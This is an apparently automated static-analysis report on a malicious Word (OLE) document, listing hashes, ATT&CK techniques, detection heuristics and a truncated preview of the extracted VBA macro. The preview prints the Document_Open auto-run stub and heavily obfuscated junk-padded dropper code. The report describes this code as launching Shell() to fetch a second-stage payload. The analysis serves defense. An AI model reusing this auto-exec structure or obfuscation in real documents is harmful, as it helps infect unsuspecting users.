Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 428e3a2342afff73…

MALICIOUS

Office (OLE)

Size: 247.5 KB
Created: 2018-09-27 22:19:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 8c18a7d96c4dd47f97ccf80a8252d2a4
SHA-1: 0f3c01d51e75dedc0f8c828676bb0fe72c58e01e
SHA-256: 428e3a2342afff737ba8e12b87ef25b87d939826597d778f40aab17ff54d543f
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is configured to execute a 'Shell()' command, indicating an attempt to download and execute a second-stage payload. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', which is a common social engineering tactic to bypass macro security settings.

Heuristics (6)

  • VBA macros detected (severity: medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro (severity: high) OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure (severity: medium) SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 69369 bytes
SHA-256: 646074da6e52c2c10c90f4dc256e944483d35f71cbe273d33a4db9bff88651ba

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Set frm = New frmMain
Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "Cgx8sRWwN"
Sub Hitler(FBFSEMs1)
If 26 < 188 Then
' vseuO
Else
' qcWVATBl
MsgBox "FFbeR"
End If
If 26 < 188 Then
' rHAOyR
Else
' ePSek4pc
Debug.Print "dbkGIPwf"
End If
Dim QnbKS
QnbKS = 95
While QnbKS <= 556
QnbKS = QnbKS + 31
Wend
lHpKNBJ = "ILXOw"
uT4FtPu = v7p10Hd & QnbKS
Dim vJ0Id
vJ0Id = 124
While vJ0Id < 658
vJ0Id = vJ0Id + 61
Wend
kxUCP = "fC6NhvYW"
mUE4uJV = vi1zjN8r & vJ0Id
If 36 < 187 Then
' pBvVI0
Else
' vuTcJm
Debug.Print "kqdTa"
End If
If 39 < 145 Then
' Mu45mDga
Else
' YCU7ZYkR
MsgBox "BJGYOrZE"
End If
Dim h2StdGh
h2StdGh = 210
While h2StdGh < 841
h2StdGh = h2StdGh + 44
Wend
zCaQKLt3Z = "m8iy6"
HW2YxE0y = Ia4x8iV & h2StdGh
If 9915 / 15 = 1243 - 1232 Then
Zy4Ebp = "YVoFD3mex"
End If
einZEHfRh = 56269
tGMhRnx7 = Zy4Ebp & einZEHfRh
Dim kImGlL5TF
kImGlL5TF = 210
While kImGlL5TF < 841
kImGlL5TF = kImGlL5TF + 44
Wend
T0E2RAPuB = 56269
wDgem9NQW = D5Lc4pa & kImGlL5TF
If 14 < 160 Then
' BiGOF
Else
' De362p
Debug.Print "wag4lR2J"
End If
Dim dNyUK
dNyUK = 192
While dNyUK <= 593
dNyUK = dNyUK + 48
Wend
vzrg45WjQ = 52677
mJCoVs = V6yUTVB & dNyUK
If 8008 / 8 = 1478 - 1465 Then
NIlFdZWT = "UQMuy0j"
End If
SQv0cS = 52677
LgRld9cF4 = NIlFdZWT & SQv0cS
If 29928 / 86 = 13680 / 13680 Then
xJLGzfH = "yviKdSo"
End If
aB03PqR = "E15gc"
sdxZ9 = xJLGzfH & aB03PqR
If 48 < 237 Then
' AF7V9d4
Else
' IGRpw
MsgBox "oBIesQH"
End If
If 29928 / 86 = 13680 / 13680 Then
FCgPdEte = "nHJQNU9L"
End If
m6xHl2YmJ = "NiDLG"
fw6trliJ7 = FCgPdEte & m6xHl2YmJ
If 28512 / 132 = 2312 - 2311 Then
Cfly3wrbJ = "x0ODk"
End If
QbERAS = "JQFJuO9fy"
bpSxfDHsm = Cfly3wrbJ & QbERAS
Dim ShFSs
ShFSs = 211
While ShFSs < 865
ShFSs = ShFSs + 52
Wend
ht8JR45B = 5683
M5F8YHC0X = bNfIop1yd & ShFSs
If 15 < 195 Then
' lBLuvnQU
Else
' yRmjVJn
Debug.Print "cSA2Ua0"
End If
Dim O3trl4SsO
O3trl4SsO = 0
While O3trl4SsO < 660
O3trl4SsO = O3trl4SsO + 54
Wend
qQaeTON = 30678
Haw2vc = egLm9FCVZ & O3trl4SsO
Dim cU8m5n4qk
cU8m5n4qk = 95
While cU8m5n4qk < 298
cU8m5n4qk = cU8m5n4qk + 52
Wend
rjV05xZMI = 10216
ZPJAKXx = ykNpD & cU8m5n4qk
If 36 < 181 Then
' AD3s5
Else
' cJQre
MsgBox "OA5MGBLY"
End If
If 18900 / 35 = 1498 - 1483 Then
ZGVD7pk = "tLkpj1ur"
End If
ek0boR2W = 54797
awmDC1is = ZGVD7pk & ek0boR2W
If 53 < 249 Then
' KNIDt16s
Else
' s0AEPi
MsgBox "QsbHTDLMi"
End If
If 27 < 184 Then
' cR1DCXtch
Else
' fMXKQjYf
MsgBox "azKYexb"
End If
If 27 < 184 Then
' eY6uhl
Else
' m2Xd0Bl
Debug.Print "HJmoqH9"
End If
Dim fxegGX
fxegGX = 244
While fxegGX < 445
fxegGX = fxegGX + 27
Wend
uoy58p = "Zf94Rv"
BOwR4 = YDKxtoJ & fxegGX
If 755 * 1 = 31738 / 2267 Then
fkXiboWGy = "XHWLt4Qi"
End If
WPUWdemAu = 45903
O4cPd16 = fkXiboWGy & WPUWdemAu
If 755 * 1 = 31738 / 2267 Then
v1EVLD = "JufsK3t"
End If
xJ1km = 45903
AFRH9x = v1EVLD & xJ1km
If 3724 / 133 = -4833 + 4836 Then
btkjLYnrD = "dZwH5oc"
End If
iU92C3 = 28948
S9Kp4RX5S = btkjLYnrD & iU92C3
Dim NRypK
NRypK = 46
While NRypK <= 515
NRypK = NRypK + 16
Wend
Ko6Os = "J5n1Vtrd"
n4EMNv9eC = PWmjiqw & NRypK
Dim ul3cb
ul3cb = 46
While ul3cb < 515
ul3cb = ul3cb + 16
Wend
Zeb4HpS = "GB0wvT78"
I5Gqu = tygRD & ul3cb
Dim mGNhkadL
mGNhkadL = 236
While mGNhkadL < 1016
mGNhkadL = mGNhkadL + 24
Wend
Uy8DXKls = "UWNondcv"
Q60X5k = CnwrDGPIt & mGNhkadL
Dim DSBPL
DSBPL = 236
While DSBPL <= 1016
DSBPL = DSBPL + 24
Wend
Sw6nI = "OWd4qa9p"
wjx2FDT = bXP5sN1 & DSBPL
If 6384 / 12 = 1037 - 1036 Then
XdWipm = "NEqMB6"
End If
e5Jl37R = "ecpoe4Lab"
EaiPKlg8 = XdWipm & e5Jl37R
Dim ogjVBdoWC
ogjVBdoWC = 236
While ogjVBdoWC < 1016
ogjVBdoWC = ogjVBdoWC + 24
Wend
hvl78 = "pAUqiB1d"
ijJW6d
... (truncated)